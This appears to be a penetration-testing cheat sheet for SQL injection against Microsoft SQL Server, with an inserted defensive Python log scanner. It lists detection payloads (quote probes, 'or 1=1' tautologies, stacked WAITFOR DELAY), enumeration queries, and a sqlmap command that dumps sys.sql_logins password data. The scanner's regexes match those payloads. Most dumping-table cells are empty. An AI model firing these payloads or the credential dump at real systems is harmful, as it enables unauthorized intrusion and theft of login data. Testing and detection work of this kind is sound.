
# MSSQL

Microsoft SQL Server is a relational database management system developed by Microsoft.\
Microsoft markets a dozen different editions of Microsoft SQL Server with various functionalities and aims. A list of the versions is available at <https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an>.

**MSSQL supports stacked queries.**

### Vulnerable parameters detection

**Injection locations**

In an HTTP request there are several possible injection points:

* URL parameters
* POST parameters
* Cookie names and values
* Host header and any custom headers

Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.

**Injection detection**

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application.\
Supplying malformed queries will trigger errors, and sending valid queries with various boolean logic statements may trigger different responses from the web server.\
Time-based payloads can also be used to detect SQL injection in MSSQL.

| Technique                                                                                 | Queries                                                                                                                                                                                                       |
| ----------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| <p>Error<br><em>A direct message can be returned or the page may act differently</em></p> | <p><code>x='</code><br><code>x=''</code><br><code>x="</code><br><code>x=""</code><br><code>x=\</code><br><code>x=\\</code><br><code>x='</code><br><code>...</code></p>                                        |
| <p>Boolean Testing<br><em>Page can react differently if true or false</em></p>            | <p><code>x=1 or 1=1 -- true</code><br><code>x=1' or 1=1 -- true</code><br><code>x=1" or 1=1 -- true</code><br><code>x=1 or 1=2 -- false</code><br><code>...</code></p>                                        |
| <p>Time Based<br><em>A delay can be induced by the query execution</em></p>               | <p><code>x=1 WAITFOR DELAY '0:0:5' -- Wait 5 seconds</code><br><code>x=1; WAITFOR DELAY '0:0:5' -- Wait 5 seconds</code><br><code>x=1 WAITFOR TIME '22:42' -- Wait until 22:42</code><br><code>...</code></p> |

**Automated detection**

The detection of vulnerable parameters can be automated, using the `BurpSuite Pro scanner` or `sqlmap` for example.

Note that second-order SQL injection, which arises when user-supplied data is first stored by the application and later incorporated into SQL queries in an unsafe manner, may not be properly detected by automated tools.
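As an added, defender-side example (not code from the original page): a small scanner that decodes the URL parameters of constructed web access-log lines and flags the error, boolean, time-based and stacked-query probes listed in the detection table above. The log lines, rule names and function names are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original page). They mimic the
# probes in the detection table: a clean request, an error probe, a boolean tautology,
# a stacked WAITFOR DELAY payload and a WAITFOR TIME payload.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=42 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=42%27 HTTP/1.1" 500 87
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=42%27+or+1%3D1+-- HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /item?id=42%3B+WAITFOR+DELAY+%270%3A0%3A5%27+-- HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /item?id=42+WAITFOR+TIME+%2722%3A42%27+-- HTTP/1.1" 200 512
"""

# One rule per technique from the detection table; each is evaluated on the decoded value.
RULES = [
    ("time_based", re.compile(r"\bWAITFOR\s+(?:DELAY|TIME)\b", re.IGNORECASE)),
    ("stacked", re.compile(r";\s*[A-Za-z]")),            # ';' followed by another statement
    ("boolean", re.compile(r"\b(?:or|and)\s+\d+\s*=\s*\d+", re.IGNORECASE)),
    ("error_probe", re.compile(r"['\"\\]$")),            # trailing unbalanced quote/backslash
]

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE)\s+(\S+)\s+HTTP/')


def classify_value(value):
    """Return the names of all techniques whose pattern matches a decoded parameter value."""
    return [name for name, pattern in RULES if pattern.search(value)]


def scan_log(text):
    """Return (client_ip, parameter_name, techniques) for every suspicious parameter in the log."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(match.group(1)).query
        # parse_qsl undoes percent-encoding and '+' so the rules see the real payload.
        for name, value in parse_qsl(query, keep_blank_values=True):
            techniques = classify_value(value)
            if techniques:
                findings.append((client_ip, name, techniques))
    return findings


if __name__ == "__main__":
    for ip, param, techniques in scan_log(SAMPLE_LOG):
        print(f"{ip} {param}: {', '.join(techniques)}")
```

The boolean rule only covers numeric tautologies such as `1=1`; string comparisons and other logic variants need additional patterns.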

### Databases dumping

| Description                | Queries                                                                                             |
| -------------------------- | --------------------------------------------------------------------------------------------------- |
| Comments                   |                                                                                                     |
| Encoding queries           |                                                                                                     |
| Obfuscating queries        |                                                                                                     |
| Disable logging mechanisms |                                                                                                     |
| MSSQL version              |                                                                                                     |
| Current user               | `SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))`                                                      |
| Users and privileges       |                                                                                                     |
| Users' passwords           | <p>Using <code>sqlmap</code>:<br><code>sqlmap -D master -T sys.sql_logins --dump [...]</code></p>    |
| Databases                  |                                                                                                     |
| Current database           | `SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))`                                                        |
| Tables                     |                                                                                                     |
| Columns                    |                                                                                                     |
| Data                       |                                                                                                     |

